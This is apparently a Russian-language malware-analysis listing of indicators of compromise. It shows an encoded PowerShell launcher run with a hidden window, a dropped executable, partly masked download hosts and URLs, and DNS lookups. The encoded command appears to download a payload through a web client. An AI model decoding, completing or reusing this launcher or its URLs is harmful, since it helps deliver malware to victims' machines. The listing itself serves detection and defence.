Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABwAF8AXwA0ADIAMwBfAF8APQAoACcAaAAnACsAJwA0ADMANwA4ACcAKwAnADgAXwAnACkAOwAkAHQAOQBfAF8ANABfADQAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABHAF8ANgAzADEAMwAyAD...
- %HOMEPATH%\467.exe
- %HOMEPATH%\467.exe
- 'su####treesnews.com':80
- 'sh#####ilverspring.com':80
- 'gr#####dica.equipment':80
- http://su####treesnews.com/0GkOWnOx16FEka
- http://sh#####ilverspring.com/DjYnScdrVeCU
- http://gr#####dica.equipment/Ftfh7wZ3JuiVUFr
- DNS ASK su####treesnews.com
- DNS ASK zi###usic.com
- DNS ASK sh#####ilverspring.com
- DNS ASK gr#####dica.equipment
- DNS ASK ha##o.pet
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABwAF8AXwA0ADIAMwBfAF8APQAoACcAaAAnACsAJwA0ADMANwA4ACcAKwAnADgAXwAnACkAOwAkAHQAOQBfAF8ANABfADQAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABHAF8ANgAzADEAMwAyAD...' (со скрытым окном)